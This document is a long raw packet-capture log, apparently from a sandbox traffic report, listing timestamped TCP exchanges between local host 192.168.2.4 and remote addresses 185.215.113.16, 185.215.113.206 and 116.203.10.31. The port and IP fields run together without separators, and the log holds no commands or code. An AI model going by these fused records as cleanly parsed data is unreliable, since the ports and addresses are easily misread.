                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.882464886 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.882575989 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.884290934 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.884326935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.886125088 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.886260033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.887919903 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.888036966 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.889842987 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.889936924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.891828060 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.891927958 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.892555952 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.893524885 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.893537045 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.895360947 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.895466089 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.897049904 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.897157907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.898902893 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.898916006 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.900497913 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.900664091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.902256012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.902405024 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.903928995 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.904015064 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.905642986 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.905653954 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.907325029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.907464027 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.909030914 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.909106016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.910748959 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.910885096 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.912523985 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.912623882 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.912674904 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.914216042 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.914297104 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.915942907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.916054010 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.917522907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.917535067 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.919150114 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.919266939 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.920722008 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.920826912 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.922446012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.922570944 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.924113989 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.924215078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.925637007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.925718069 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.927515984 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.927690029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.929302931 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.929404020 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.930790901 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.930847883 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.932255030 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.932389021 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.932940960 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.933664083 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.933782101 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.935303926 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.935409069 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.936809063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.936997890 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.938539982 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.938687086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.939640045 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.939723969 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.941118002 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.941250086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.942572117 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.942703009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.943921089 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.944041014 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.945382118 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.945523977 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.946831942 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.946908951 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.948263884 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.948368073 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.949635029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.953069925 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.973323107 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.984337091 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.984379053 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.984457016 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.984488964 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.038100004 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.038114071 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.039738894 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.039745092 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.039804935 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.039819002 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.040057898 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.040080070 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.040318966 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.040333033 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.049598932 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.049674034 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.050201893 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.050221920 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.051132917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.051188946 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.052238941 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.052378893 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.052437067 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.052531004 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.053575993 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.053715944 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.054181099 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.054774046 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.054874897 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.055946112 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.056015015 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.057277918 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.057357073 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.058955908 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.058967113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.060075045 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.060142994 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.061204910 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.061245918 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.062230110 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.062266111 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.063780069 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.063858032 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.064392090 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.064404011 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.065623999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.065634966 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.065979004 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.066091061 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.066148996 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.066303968 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.066762924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.066884995 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.067975044 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.068044901 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.069201946 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.069302082 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.070406914 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.070534945 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.071607113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.071703911 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.072784901 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.072906017 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.074064970 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.074177980 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.074268103 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.075184107 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.075262070 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.075309038 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.075376987 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.076411963 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.076507092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.076704979 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.077613115 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.077721119 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.078298092 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.078839064 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.079026937 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.079201937 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.080044031 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.080204964 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.080368996 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.081448078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.081530094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.082500935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.082577944 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.083666086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.083775997 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.084903002 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.084994078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.086040974 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.086165905 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.086961031 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.087138891 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.087344885 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.087461948 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.087495089 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.088455915 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.088582039 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.089253902 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.089643955 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.089711905 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.090898991 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.090917110 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.091018915 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.092089891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.092200041 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.093322992 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.093333960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.094449043 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.094594002 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.094768047 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.095822096 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.095920086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.096976042 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.097038984 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.098083973 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.098189116 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.099333048 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.099504948 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.100487947 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.100653887 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.101735115 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.101836920 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.102931976 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.103179932 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.104109049 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.104195118 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.105324030 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.105439901 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.106544971 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.106606007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.107779026 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.107878923 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.108850956 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.108911037 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.109688044 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.109790087 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.109822035 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.110085964 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.110146046 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.111179113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.111299038 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.112284899 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.114981890 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.200455904 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.241664886 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.241677999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.241841078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.242001057 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.242887974 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.242898941 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.243832111 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.243976116 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.244854927 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.244940996 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.245806932 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.245929003 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.246797085 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.246941090 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.247325897 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.247370005 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.247862101 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.247917891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.248786926 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.248903036 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.249058962 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.249883890 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.250021935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.250885963 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.250957012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.251871109 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.251934052 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.252830982 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.252959013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.253771067 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.253851891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.254734039 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.254846096 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.255667925 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.255803108 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.255826950 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.264017105 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.277865887 CET8049840185.215.113.16192.168.2.4
